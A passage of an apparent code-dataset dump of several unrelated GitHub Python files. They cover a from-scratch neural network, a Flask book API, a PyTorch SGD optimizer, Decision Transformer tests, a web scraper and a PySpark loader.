conn_layer1[i].apply_weight()\r\n # print(\"conn1: {0}\".format(conn_layer1[i].output))\r\n\r\n for j in range(l2):\r\n Layer2[j].summer()\r\n # print(\" \")\r\n for i in range(len(conn_layer2)):\r\n conn_layer2[i].apply_weight()\r\n # print(\"conn2: {0}\".format(conn_layer2[i].output))\r\n\r\n for j in range(l3):\r\n Layer3[j].summer()\r\n\r\n for i in range(len(conn_layer3)):\r\n conn_layer3[i].apply_weight()\r\n\r\n\r\n#feed_forward()\r\n\r\n\r\ndef fn():\r\n print(Layer2[0].num_dendrites())\r\n print(Layer3[0].num_dendrites())\r\n print(len(conn_layer1))\r\n print(len(conn_layer2))\r\n\r\n\r\ndef backprop(expected):\r\n g_errors = []\r\n # delta of layer 3:\r\n for i in range(len(Layer3)):\r\n 
g_errors.append(Layer3[i].sumout - expected[i])\r\n Layer3[i].delta = -g_errors[i] * der_sig(Layer3[i].sum) # derivative of sigmoid\r\n #Layer3[i].delta = -(Layer3[i].sumout - expected[i])*learning_rate\r\n # delta of layer 2:\r\n for hidden_layer in range(1, num_layers - 1):\r\n for i in range(widths[num_layers - hidden_layer - 1]): # 1\r\n sum_portion = 0\r\n for j in range(widths[num_layers - hidden_layer]): # 2\r\n weight = conn_layer2[i * widths[num_layers - hidden_layer] + j].weight # 2\r\n sum_portion += weight * Layer3[j].delta\r\n Layer2[i].delta = der_sig(Layer2[i].sum) * sum_portion\r\n\r\n # grad of conn layer2 :\r\n # for connlayer in range(num_layers - 2,0,-1):\r\n for i in range(widths[1]): # 1\r\n for j in range(widths[2]): # 2\r\n conn_layer2[i * widths[2] + j].gradient = Layer3[j].delta * Layer2[i].sumout # 2\r\n\r\n # change weights in layer 2\r\n for i in range(widths[1]): # 1\r\n for j in range(widths[2]): # 2\r\n conn_layer2[i * widths[2] + j].del_weight = learning_rate * conn_layer2[i * widths[2] + j].gradient + \\\r\n momentum * learning_rate * conn_layer2[\r\n i * widths[2] + j].prev_del_weight # 222\r\n # conn_layer2[i * widths[2] + j].weight += conn_layer2[i*widths[2]+j].del_weight\r\n conn_layer2[i * widths[2] + j].sum_del_weight += conn_layer2[i * widths[2] + j].del_weight # 22\r\n conn_layer2[i * widths[2] + j].prev_del_weight = conn_layer2[i * widths[2] + j].del_weight # 22\r\n\r\n # grad of conn layer1\r\n for i in range(widths[0]):\r\n for j in range(widths[1]):\r\n conn_layer1[i * widths[1] + j].gradient = Layer2[j].delta * Layer1[i].sumout\r\n\r\n # change weights in conn layer1\r\n for i in range(widths[0]):\r\n for j in range(widths[1]):\r\n conn_layer1[i * widths[1] + j].del_weight = learning_rate * conn_layer1[i * widths[1] + j].gradient + \\\r\n momentum * learning_rate * conn_layer1[\r\n i * widths[1] + j].prev_del_weight\r\n # conn_layer1[i * widths[1] + j].weight += conn_layer1[i*widths[1]+j].del_weight\r\n conn_layer1[i * widths[1] + j].sum_del_weight += conn_layer1[i * widths[1] + j].del_weight\r\n conn_layer1[i * widths[1] + j].prev_del_weight = conn_layer1[i * widths[1] + j].del_weight\r\n\r\n\r\ncount = 0\r\n\r\n\r\ndef clear_sum_deltas():\r\n for i in range(widths[1]):\r\n for j in range(widths[2]):\r\n conn_layer2[i * widths[2] + j].sum_del_weight = 0\r\n for i in range(widths[0]):\r\n for j in range(widths[1]):\r\n conn_layer1[i * widths[1] + j].sum_del_weight = 0\r\n\r\n\r\ndef add_deltas():\r\n for i in range(widths[1]):\r\n for j in range(widths[2]):\r\n conn_layer2[i * widths[2] + j].weight += conn_layer2[i * widths[2] + j].sum_del_weight\r\n for i in range(widths[0]):\r\n for j in range(widths[1]):\r\n conn_layer1[i * widths[1] + j].weight += conn_layer1[i * widths[1] + j].sum_del_weight\r\n\r\n\r\n\r\nsq_sum = 0\r\n\r\ndef apply_input(ip_no):\r\n for i in range(len(inputs[0])):\r\n Layer1[i].sumout = inputs[ip_no][i]\r\n\r\n\r\n# while Layer3[0].sumout > 0.45:\r\n\r\ndef stop(event):\r\n global close\r\n close = True\r\nroot.bind(\"\", stop)\r\n\r\n\r\ndef train():\r\n global mse\r\n global epochs\r\n global close\r\n close = False\r\n sq_sum = 1\r\n count = 0\r\n print(\"\\nTraining...\")\r\n # for i in range(5000):\r\n while not close: #sq_sum > 0.001:\r\n clear_sum_deltas()\r\n\r\n\r\n for j in range(len(inputs)):\r\n apply_input(j)\r\n Connection.max_weight = 1\r\n Connection.min_weight = 0\r\n feed_forward()\r\n for neuron_num in range(widths[2]):\r\n sq_sum += (Layer3[neuron_num].sumout - expected[j][neuron_num]) ** 2\r\n 
backprop(expected[j])\r\n sq_sum /= len(inputs)\r\n #print(\"MSE: {}\".format(sq_sum))\r\n mse = sq_sum\r\n\r\n count += 1\r\n epochs=count\r\n add_deltas()\r\n if count%100 == 0:\r\n redraw(j)\r\n\r\n print(\"Epochs : {}\".format(count))\r\n print(\"MSE: {}\".format(sq_sum))\r\n\r\n\r\ndef printall(layer):\r\n print(\" : \", end=\"\")\r\n for i in range(len(layer)):\r\n print(\"{0:.2f}\".format(layer[i].sumout), end=\"\")\r\n print(\", \", end=\"\")\r\n print()\r\n\r\n\r\ndef print_weights():\r\n print(\"Layer 1 \\t\\t\\t Layer 2\")\r\n count = 0\r\n\r\n while count < len(conn_layer1) or count < len(conn_layer2):\r\n if count < len(conn_layer1):\r\n print(conn_layer1[count].weight, end=\" \\t \")\r\n if count < len(conn_layer2):\r\n print(conn_layer2[count].weight, end=\"\")\r\n print()\r\n count += 1\r\n\r\n\r\n#print_weights()\r\n\r\n#redraw_del()\r\nwaiting = True\r\nprint(\"Number of neurons \")\r\nprint(Neuron.num_neurons)\r\nprint(\"Number of connections \")\r\nprint(Connection.num_connections)\r\nprint(\"before: \")\r\nfor j in range(len(inputs)):\r\n apply_input(j)\r\n for i in range(len(inputs[0])):\r\n print(\"{} \".format(inputs[j][i]), end=\"\")\r\n feed_forward()\r\n printall(Layer3)\r\n for neuron_num in range(widths[2]):\r\n sq_sum += (Layer3[neuron_num].sumout - expected[j][neuron_num]) ** 2\r\n backprop(expected[j])\r\nsq_sum /= len(inputs)\r\nprint(\"MSE: {}\".format(sq_sum))\r\n\r\n\r\ntrain()\r\nprint(\"after training:\")\r\n\r\nfor j in range(len(inputs)):\r\n apply_input(j)\r\n for i in range(len(inputs[0])):\r\n print(\"{} \".format(inputs[j][i]), end=\"\")\r\n feed_forward()\r\n printall(Layer3)\r\n\r\nprint(\"new ip: \")\r\nfor j in range(len(newinput)):\r\n for i in range(len(newinput[0])):\r\n Layer1[i].sumout = newinput[j][i]\r\n for i in range(len(newinput[0])):\r\n print(\"{} \".format(newinput[j][i]), end=\"\")\r\n feed_forward()\r\n printall(Layer3)\r\n# printWeights()\r\n\r\nConnection.wip = True\r\nclose = False\r\n\r\nprint(\"Min {} , max {}\".format(Connection.min_weight, Connection.max_weight))\r\nprint(\"Min {} , max {}\".format(conn_layer1[0].min_weight, conn_layer1[0].max_weight))\r\n\r\nprint(\"Min {} , max {}\".format(conn_layer1[1].min_weight, conn_layer1[1].max_weight))\r\nprint(\"Min {} , max wip {}\".format(Connection.min_weight_wip, Connection.max_weight_wip))\r\n\r\ndef doSomething():\r\n # check if saving\r\n # if not:\r\n global close\r\n close = True\r\n root.destroy()\r\nroot.protocol('WM_DELETE_WINDOW', doSomething) # root is your root window\r\n\r\nip_app=0\r\ndef key(event):\r\n global ip_app\r\n ip_app += 1\r\n if ip_app >= len(inputs):\r\n ip_app = 0\r\n Connection.max_weight = 1\r\n Connection.min_weight = 0\r\n apply_input(ip_app)\r\n feed_forward()\r\n redraw(ip_app)\r\n\r\nroot.bind(\"\", key)\r\n\r\nroot.mainloop()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"TanmayDeshmukh/ANN-without-numpy","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":17931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"800962775","text":"from django.urls import path\nfrom .views import register,index,addfile,user_login,logout_view,Detail\n\nurlpatterns = [\n path('',index,name='index'),\n path('register/', register, name='register'),\n path('login/', user_login, name='login'),\n path('logout/', logout_view, name='logout'),\n path('add/', addfile, name='add'),\n path('detail/', Detail, 
name='detail'),\n\n\n]\n","repo_name":"guluzadef/File-upload","sub_path":"todo_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"72852309662","text":"\r\n# Copyright 2020 Huawei Technologies Co., Ltd\r\n#\r\n# Licensed under the Apache License, Version 2.0 (the \"License\");\r\n# you may not use this file except in compliance with the License.\r\n# You may obtain a copy of the License at\r\n#\r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n#\r\n# Unless required by applicable law or agreed to in writing, software\r\n# distributed under the License is distributed on an \"AS IS\" BASIS,\r\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n# See the License for the specific language governing permissions and\r\n# limitations under the License.\r\n\r\n \r\nimport torch\r\nfrom torch.optim.optimizer import Optimizer, required\r\n\r\n\r\nclass CaffeSGD(Optimizer):\r\n r\"\"\"Implements actual stochastic gradient descent (optionally with momentum).\r\n\r\n Nesterov momentum is based on the formula from\r\n `On the importance of initialization and momentum in deep learning`__.\r\n\r\n Args:\r\n params (iterable): iterable of parameters to optimize or dicts defining\r\n parameter groups\r\n lr (float): learning rate\r\n momentum (float, optional): momentum factor (default: 0)\r\n weight_decay (float, optional): weight decay (L2 penalty) (default: 0)\r\n dampening (float, optional): dampening for momentum (default: 0)\r\n nesterov (bool, optional): enables Nesterov momentum (default: False)\r\n \"\"\"\r\n\r\n def __init__(self, params, lr=required, momentum=0, dampening=0,\r\n weight_decay=0, nesterov=False):\r\n if lr is not required and lr < 0.0:\r\n raise ValueError(\"Invalid learning rate: {}\".format(lr))\r\n if momentum < 0.0:\r\n raise ValueError(\"Invalid momentum value: {}\".format(momentum))\r\n if weight_decay < 0.0:\r\n raise ValueError(\"Invalid weight_decay value: {}\".format(weight_decay))\r\n\r\n defaults = dict(lr=lr, momentum=momentum, dampening=dampening,\r\n weight_decay=weight_decay, nesterov=nesterov)\r\n if nesterov and (momentum <= 0 or dampening != 0):\r\n raise ValueError(\"Nesterov momentum requires a momentum and zero dampening\")\r\n super(CaffeSGD, self).__init__(params, defaults)\r\n\r\n def __setstate__(self, state):\r\n super(CaffeSGD, self).__setstate__(state)\r\n for group in self.param_groups:\r\n group.setdefault('nesterov', False)\r\n\r\n @torch.no_grad()\r\n def step(self, closure=None):\r\n \"\"\"Performs a single optimization step.\r\n\r\n Arguments:\r\n closure (callable, optional): A closure that reevaluates the model\r\n and returns the loss.\r\n \"\"\"\r\n loss = None\r\n if closure is not None:\r\n with torch.enable_grad():\r\n loss = closure()\r\n\r\n for group in self.param_groups:\r\n weight_decay = group['weight_decay']\r\n momentum = group['momentum']\r\n dampening = group['dampening']\r\n nesterov = group['nesterov']\r\n\r\n for p in group['params']:\r\n if p.grad is None:\r\n continue\r\n d_p = p.grad\r\n if weight_decay != 0:\r\n d_p = d_p.add(p, alpha=weight_decay)\r\n\r\n d_p.mul_(group['lr'])\r\n\r\n if momentum != 0:\r\n param_state = self.state[p]\r\n if 'momentum_buffer' not in param_state:\r\n buf = param_state['momentum_buffer'] = torch.zeros_like(p.data)\r\n buf.mul_(momentum).add_(d_p)\r\n else:\r\n buf = param_state['momentum_buffer']\r\n buf.mul_(momentum).add_(d_p, 
alpha=1 - dampening)\r\n if nesterov:\r\n d_p = d_p.add(buf, alpha=momentum)\r\n else:\r\n d_p = buf\r\n\r\n p.data.add_(-1, d_p)\r\n\r\n return loss\r\n","repo_name":"Ascend/ModelZoo-PyTorch","sub_path":"PyTorch/built-in/cv/object_tracking/GOTURN_for_PyTorch/src/goturn/optimizer/caffeSGD.py","file_name":"caffeSGD.py","file_ext":"py","file_size_in_byte":3943,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"7"} +{"seq_id":"826004080","text":"from flask import Flask, request, g, make_response, abort\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_migrate import Migrate\nfrom flask_moment import Moment\nfrom flask_httpauth import HTTPTokenAuth, HTTPBasicAuth\nimport secrets\nfrom datetime import datetime as dt, timedelta\nfrom functools import wraps\nimport os\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\napp = Flask(__name__)\ndb = SQLAlchemy()\nmigrate = Migrate()\nmoment = Moment()\ntoken_auth = HTTPTokenAuth()\nbasic_auth = HTTPBasicAuth()\n\n##---------- Database ----------##\nclass Config():\n SECRET_KEY = os.environ.get(\"SECRET_KEY\")\n SQLALCHEMY_DATABASE_URI = \"sqlite:///\" + os.path.join(basedir, 'app.db')\n SQLALCHEMY_TRACK_MODIFICATIONS = False\n##---------- Database ----------##\n\n##---------- Database Information ----------##\nclass User(db.Model):\n user_id = db.Column(db.Integer, primary_key=True)\n first_name = db.Column(db.String)\n last_name = db.Column(db.String)\n email = db.Column(db.String, unique=True, index=True)\n password = db.Column(db.String)\n created_on = db.Column(db.DateTime, default=dt.utcnow)\n is_admin = db.Column(db.Boolean, default=False)\n token = db.Column(db.String, index=True, unique=True)\n token_exp = db.Column(db.DateTime)\n\n ##---------- Token Methods ----------##\n def get_token(self, exp=86400):\n current_time = dt.utcnow()\n if self.token and self.token_exp > current_time + timedelta(seconds=60):\n return self.token\n self.token = secrets.token_urlsafe(32)\n self.token_exp = current_time + timedelta(seconds=exp)\n self.save()\n return self.token\n\n def revoke_token(self):\n self.token_exp = dt.utcnow() - timedelta(seconds=61)\n \n @staticmethod\n def check_token(token):\n user = User.query.filter_by(token=token).first()\n if not user or user.token_exp < dt.utcnow():\n return None\n return user\n ##---------- Token Methods ----------##\n\n ##---------- User Methods ----------##\n def __repr__(self):\n return f''\n\n def __str__(self):\n return f''\n\n def from_dict(self, data):\n self.first_name = data['first_name']\n self.last_name = data['last_name']\n self.email=data['email']\n self.password = self.hash_password(data['password'])\n self.icon = data['icon']\n\n def save(self):\n db.session.add(self) \n db.session.commit()\n\n def to_dict(self):\n return {\n 'id':self.id,\n 'first_name':self.first_name,\n 'last_name':self.last_name,\n 'email':self.email,\n 'created_on':self.created_on,\n 'icon':self.icon,\n 'is_admin':self.is_admin,\n 'token':self.token\n }\n\nclass Book(db.Model):\n book_id = db.Column(db.Integer, primary_key = True)\n title = db.Column(db.String)\n author = db.Column(db.String)\n pages = db.Column(db.Integer)\n summary = db.Column(db.String)\n image = db.Column(db.String)\n\n def __repr__(self):\n return f''\n\n def edit(self, new_title):\n self.title=new_title\n\n def save(self):\n db.session.add(self) \n db.session.commit() \n \n def delete(self):\n db.session.delete(self)\n db.session.commit()\n\n def to_dict(self):\n return {\n 'book_id': self.book_id,\n 
'title': self.title,\n            'author': self.author,\n            'pages': self.pages,\n            'summary': self.summary,\n            'image': self.image\n        }\n\n    def from_dict(self, data):\n        self.title = data['title']\n        self.author = data['author']\n        self.pages = data['pages']\n        self.summary = data['summary']\n        self.image = data['image']\n##---------- Database Information ----------##\n\n##---------- Auth Information ----------##\n\n@token_auth.verify_token\ndef verify_token(token):\n    user = User.check_token(token) if token else None\n    g.current_user = user\n    return user\n\n@basic_auth.verify_password\ndef verify_password(email, password):\n    user = User.query.filter_by(email=email).first()\n    if user is None:\n        return False\n    g.current_user = user\n    return user.check_hashed_password(password)\n\n##---------- Auth Information ----------##\n\n##---------- Helpers ----------##\n\ndef require_admin(f, *args, **kwargs):\n    @wraps(f)\n    def check_admin(*args, **kwargs):\n        if not g.current_user.is_admin:\n            abort(403)\n        else:\n            return f(*args, **kwargs)\n    return check_admin\n\n##---------- Helpers ----------##\n\n##---------- /login ----------##\n# GET => Returns User info (not password) along with the User Token\n@app.get('/login')\n@basic_auth.login_required()\ndef get_login():\n    user = g.current_user\n    token = user.get_token()\n    return make_response({\"token\": token, **user.to_dict()}, 200)\n##---------- /login ----------##\n\n##---------- /user ----------##\n# POST => Register a User\n# PUT => Edit a user by id\n# DELETE => Remove a User by id\n    # \"first_name\" = \"String\"\n    # \"last_name\" = \"String\"\n    # \"email\" = \"String\"\n    # \"password\" = \"String\"\n    # \"created_on\" = \"DateTime\"\n    # \"is_admin\" = \"Boolean\"\n\n@app.post('/user/<int:id>')\n@token_auth.login_required()\n@require_admin\ndef register_user(id):\n    new_user_dict = request.get_json()\n    if not all(key in new_user_dict for key in ('first_name', 'last_name', 'email', 'password', 'created_on', 'is_admin')):\n        abort(404)\n    new_user = User()\n    new_user.from_dict(new_user_dict)\n    new_user.save()\n    return make_response(f\"User {new_user.first_name} {new_user.last_name} has been created with id: {new_user.user_id}\", 200)\n\n@app.put('/user/<int:id>')\n@token_auth.login_required()\n@require_admin\ndef put_user(id):\n    user_dict = request.get_json()\n    user = User.query.get(id)\n    if not user:\n        abort(404)\n    user.from_dict(user_dict)\n    user.save()\n    return make_response(f\"User {user.user_id} has been updated\", 200)\n\n@app.delete('/user/<int:id>')\n@token_auth.login_required()\n@require_admin\ndef delete_user(id):\n    user_to_delete = User.query.get(id)\n    if not user_to_delete:\n        abort(404)\n    user_to_delete.delete()\n    return make_response(f\"User with id {id} has been deleted\", 200)\n\n##---------- /book ----------##\n# /book\n# GET => Return a list of all Books\n# GET => Return book info for book by id\n# POST => Creates a new Book \n# PUT => Edits a Book by id\n# DELETE => Delete a Book by id\n\n# GET => Return a list of all Books\n@app.get('/book')\n@token_auth.login_required()\ndef get_book():\n    books = Book.query.all()\n    book_dicts = [book.to_dict() for book in books]\n    return make_response({\"books\": book_dicts}, 200)\n\n# GET => Return book info for book by id\n@app.get('/book/<int:id>')\n@token_auth.login_required()\ndef get_book_by_id(id):\n    book = Book.query.get(id)\n    if not book:\n        abort(404)\n    book_dict = book.to_dict()\n    return make_response(book_dict, 200)\n\n# POST => Creates a new Book \n    # \"title\" = \"String\"\n    # \"author\" = \"String\"\n    # \"pages\" = \"Integer\"\n    # \"summary\" = \"String\"\n    # \"image\" = \"String\"\n\n@app.post('/book')\n@token_auth.login_required()\n@require_admin\ndef post_book():\n    book_dict = request.get_json()\n    if not all(key in book_dict for key in ('title', 'author', 'pages', 'summary', 'image')):\n        abort(404)\n    book = Book()\n    book.from_dict(book_dict)\n    book.save()\n    return make_response(f\"Book {book.title} was created with an id {book.book_id}\", 200)\n\n\n# PUT => Edits a Book by id\n@app.put('/book/<int:id>')\n@token_auth.login_required()\n@require_admin\ndef put_book(id):\n    book_dict = request.get_json()\n    book = Book.query.get(id)\n    if not book:\n        abort(404)\n    book.from_dict(book_dict)\n    book.save()\n    return make_response(f\"Book {book.title} with ID {book.book_id} has been updated\", 200)\n\n# DELETE => Delete a Book by id\n@app.delete('/item/<int:id>')\n@token_auth.login_required()\n@require_admin\ndef delete_book(id):\n    book_to_delete = Book.query.get(id)\n    if not book_to_delete:\n        abort(404)\n    book_to_delete.delete()\n    return make_response(f\"Book with id: {id} has been removed\",200)\n\nif __name__ == \"__main__\":\n    app.run(debug=True)","repo_name":"ItsDakk/wk7_api_project","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"69916395745","text":"from collections import deque, defaultdict\nimport sys\ninput = sys.stdin.readline\nN, M = map(int, input().split())\nGraph = defaultdict(list)\nfor _ in range(N - 1):\n    u, v, w = map(int, input().split())\n    Graph[u].append([v, w])\n    Graph[v].append([u, w])\n\ndef BFS(start, end):\n    Queue = deque([[start, 0]])\n    visited = [False] * (N + 1)\n    visited[start] = True\n    while Queue:\n        cur, w = Queue.popleft()\n\n        for next, dist in Graph[cur]:\n            if not visited[next]:\n                if next == end:\n                    return w + dist\n                visited[next] = True\n                Queue.append([next, w + dist])\n    return 0\n\nfor _ in range(M):\n    s, e = map(int, input().split())\n    print(BFS(s, e))\n","repo_name":"alsrua7222/BOJ_Algorithm_Study","sub_path":"Solved/1000/1240/1240.py","file_name":"1240.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"1117567707","text":"import pytest\nimport torch\nfrom src.config import TransformerModelConfig, EnvironmentConfig\nfrom src.models.trajectory_model import DecisionTransformer\nfrom src.environments.environments import make_env\nfrom src.decision_transformer.train import evaluate_dt_agent\nfrom src.decision_transformer.offline_dataset import TrajectoryDataset\n\n# need an agent.\n\n# def test_train():\n#     pass\n\n# def test_test():\n#     pass\n\n\ndef test_evaluate_dt_agent():\n\n    trajectory_path = \"tests/fixtures/test_trajectories.pkl\"\n    trajectory_data_set = TrajectoryDataset(\n        trajectory_path,\n        pct_traj=1, device=\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n    env_id = trajectory_data_set.metadata['args']['env_id']\n    env = make_env(env_id, seed=1, idx=0, capture_video=False,\n                   run_name=\"dev\", fully_observed=False, max_steps=30)\n    env = env()\n\n    # dt = DecisionTransformer(\n    #     env=env,\n    #     d_model=128,\n    #     n_heads=4,\n    #     d_mlp=256,\n    #     n_layers=2,\n    #     state_embedding_type=\"grid\",  # hard-coded for now to minigrid.\n    #     max_timestep=1000,\n    #     n_ctx=3,  # one timestep of context\n    #     device=\"cuda\" if torch.cuda.is_available() else \"cpu\",\n    # )  # Our DT must have a context window large enough\n\n    dt = DecisionTransformer(\n        environment_config=EnvironmentConfig(\n            env_id=env_id,\n            one_hot_obs=trajectory_data_set.observation_type == \"one_hot\",\n            view_size=7,  # trajectory_data_set.metadata['args']['view_size'],\n            fully_observed=False,\n            capture_video=False,\n            
render_mode='rgb_array',\n max_steps=1000),\n transformer_config=TransformerModelConfig(\n d_model=128,\n n_heads=4,\n d_mlp=256,\n n_layers=2,\n state_embedding_type=\"grid\", # hard-coded for now to minigrid.\n # max_timestep=1000,\n n_ctx=3, # one timestep of context\n device=\"cuda\" if torch.cuda.is_available() else \"cpu\",\n ))\n\n if hasattr(dt, \"environment_config\"):\n max_steps = min(dt.environment_config.max_steps, 10)\n else:\n max_steps = min(dt.max_timestep, 10)\n\n batch = 0\n eval_env_func = make_env(\n env_id=env.spec.id,\n seed=batch,\n idx=0,\n capture_video=True,\n max_steps=max_steps,\n run_name=f\"dt_eval_videos_{batch}\",\n fully_observed=False,\n flat_one_hot=(trajectory_data_set.observation_type == \"one_hot\"),\n )\n\n statistics = evaluate_dt_agent(\n env_id=env_id,\n model=dt,\n env_func=eval_env_func,\n track=False,\n initial_rtg=1,\n trajectories=10,\n device=\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n assert statistics[\"prop_completed\"] == 0.0\n assert statistics[\"prop_truncated\"] == 1.0\n assert statistics[\"mean_reward\"] == 0.0\n assert statistics[\"prop_positive_reward\"] == 0.0\n # traj length approx 10\n assert statistics[\"mean_traj_length\"] == pytest.approx(10.0, 1.0)\n","repo_name":"echowne/DecisionTransformerInterpretability","sub_path":"tests/acceptance/test_dt_train.py","file_name":"test_dt_train.py","file_ext":"py","file_size_in_byte":3059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"7"} +{"seq_id":"26599916184","text":"from bs4 import BeautifulSoup\nimport requests\nfrom fake_useragent import UserAgent\n\nUserAgent().chrome\n\n# определяем список ключевых слов\nKEYWORDS = [\"web\", \"python\", \"Привет\", \"РФ\"]\nheader={'User-Agent': UserAgent().chrome}\n\nbase_url = \"https://habr.com/\"\nurl = base_url + \"ru/all\"\n\nresponse = requests.get(url, headers=header)\ndata = response.text\nsoup = BeautifulSoup(data, features=\"html.parser\")\narticles = soup.find_all(\"article\")\nfor article in articles:\n publishigs = article.find(class_=\"tm-article-body tm-article-snippet__lead\")\n publishigs = str(publishigs.text)\n date_publishig = article.find(\"time\").attrs['title']\n title = article.find(\"h2\").find(\"span\").text\n href = article.find(class_ = \"tm-article-snippet__title-link\").attrs[\"href\"]\n for el in KEYWORDS:\n if el in publishigs:\n print()\n print(f'{ date_publishig}, {title}', {base_url + href})\n print(\"-\"*100)\n print(publishigs)\n ","repo_name":"Hamlet-Oganisyan/Professional_work_with_Python","sub_path":"3_Parssing/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"21986983076","text":"import pytest\r\nfrom pytest_mock import MockerFixture\r\nfrom httpx import AsyncClient\r\nfrom starlette import status\r\nfrom fastapi.applications import FastAPI\r\n\r\npytestmark = pytest.mark.asyncio\r\n\r\n\r\ncreated_team = {\"id\": 1, \"name\": \"team\", \"description\": \"description\"}\r\n\r\n\r\nasync def test_get_teams(client: AsyncClient, mocker: MockerFixture):\r\n mocker.patch(\r\n \"app.services.team_services.TeamServices.get_all\",\r\n return_value={\r\n \"total_items\": 1,\r\n \"current_page\": 1,\r\n \"total_pages\": 1,\r\n \"items\": [created_team],\r\n },\r\n )\r\n response = await client.get(\"/api/teams\")\r\n rs_body = response.json()\r\n assert len(rs_body[\"items\"]) == rs_body[\"total_items\"]\r\n\r\n\r\nasync def 
test_create_team(authorized_client: AsyncClient, mocker: MockerFixture):\r\n mocker.patch(\r\n \"app.services.team_services.TeamServices.create\",\r\n return_value=created_team,\r\n )\r\n response = await authorized_client.post(\r\n \"/api/teams\",\r\n json={\"name\": \"team\", \"description\": \"description\"},\r\n )\r\n assert response.status_code == 200\r\n\r\n rs_body = response.json()\r\n assert rs_body[\"name\"] == \"team\"\r\n\r\n\r\nasync def test_cannot_create_team_if_not_logged(\r\n client: AsyncClient, mocker: MockerFixture\r\n):\r\n mocker.patch(\r\n \"app.services.team_services.TeamServices.create\",\r\n return_value=created_team,\r\n )\r\n response = await client.post(\r\n \"/api/teams\",\r\n json={\"name\": \"test\", \"description\": \"test description\"},\r\n )\r\n assert response.status_code == status.HTTP_403_FORBIDDEN\r\n\r\n\r\n@pytest.mark.parametrize(\"role\", [\"invalid_role\"])\r\nasync def test_cannot_create_team_if_not_authorized(\r\n authorized_client: AsyncClient, mocker: MockerFixture\r\n):\r\n mocker.patch(\r\n \"app.services.team_services.TeamServices.create\",\r\n return_value=created_team,\r\n )\r\n response = await authorized_client.post(\r\n \"/api/teams\",\r\n json={\"name\": \"test\", \"description\": \"test description\"},\r\n )\r\n assert response.status_code == status.HTTP_403_FORBIDDEN\r\n","repo_name":"mauriciomendonca-zz/boilerplate","sub_path":"tests/test_api/test_routes/test_teams.py","file_name":"test_teams.py","file_ext":"py","file_size_in_byte":2114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"38009233770","text":"#spark-submit --master local[*] FileLoader.py\r\n#spark-submit --jars spark-csv_2.11-1.5.0.jar,commons-csv-1.8.jar,spark-xml_2.11-0.9.0.jar --master local[*] FileLoader.py\r\n#export PYTHONIOENCODING=utf8\r\n\r\nimport pyspark\r\nfrom pyspark.sql import SparkSession\r\nfrom pyspark.sql.types import StructType,StructField, StringType, IntegerType, ArrayType, DoubleType, BooleanType\r\n\r\nspark = SparkSession.builder.appName('FileLoader').getOrCreate()\r\n#spark = SparkSession.builder.appName('FileLoader').master(\"local\").enableHiveSupport().getOrCreate()\r\nsc = spark.sparkContext\r\nsc.setLogLevel(\"ERROR\")\r\n\r\nfilename=\"hdfs://randstad-niit-bigdataspark-164-52-214-120-e2e7-70155-ncr.cluster:8020/user/bigdata/EmployeesAll.csv\"\r\n\r\ndf = spark.read.csv(filename)\r\ndf.printSchema()\r\n\r\ndf2 = spark.read.option(\"header\",True).csv(filename)\r\ndf2.printSchema()\r\n\r\ndf3 = spark.read.options(header='True', delimiter=',').csv(filename)\r\ndf3.printSchema()\r\n\r\nschema = StructType().add(\"EmployeeId\",IntegerType(),True).add(\"BirthDate\",StringType(),True).add(\"FirstName\",StringType(),True).add(\"LastName\",StringType(),True).add(\"Gender\",StringType(),True).add(\"JoiningDate\",StringType(),True)\r\ndf4 = spark.read.format(\"csv\").option(\"header\", True).schema(schema).load(filename)\r\ndf4.printSchema()\r\ndf4.coalesce(1).write.mode('Overwrite').option(\"header\",True).csv(\"/user/bigdata/EmpNice\")\r\n\r\ndf2.write.csv(\"/user/bigdata/res1\")\r\ndf2.write.mode('Overwrite').csv(\"/user/bigdata/res1\")\r\ndf2.write.mode('Overwrite').option(\"header\",True).csv(\"/user/bigdata/res1\")\r\ndf2.write.mode('Overwrite').json(\"/user/bigdata/res2\")\r\ndf2.coalesce(1).write.mode('Overwrite').parquet(\"/user/bigdata/res3\") 
\r\ndf2.coalesce(1).write.mode('Overwrite').orc(\"/user/bigdata/res4\")\r\ndf2.coalesce(1).write.mode('Overwrite').format(\"com.databricks.spark.xml\").option(\"rootTag\", \"Employees\").option(\"rowTag\", \"Employee\").save(\"/user/bigdata/res5\")\r\n\r\nmultiline_df = spark.read.option(\"multiline\",\"true\").json(\"hdfs://randstad-niit-bigdataspark-164-52-214-120-e2e7-70155-ncr.cluster:8020/user/bigdata/sample.json\")\r\nmultiline_df.show()\r\n\r\nrdf1=spark.read.parquet(\"/user/bigdata/res3/*\")\r\nrdf1.createOrReplaceTempView(\"emps\")\r\nspark.sql(\"select * from emps where gender = 'M' and first_name like '%Ara%' and last_name like '%Ba%'\").show(truncate=False)\r\n\r\nrdf2=spark.read.orc(\"/user/bigdata/res4/*\")\r\nrdf2.createOrReplaceTempView(\"emps2\")\r\nspark.sql(\"select * from emps2 where gender = 'M' and first_name like '%Ara%' and last_name like 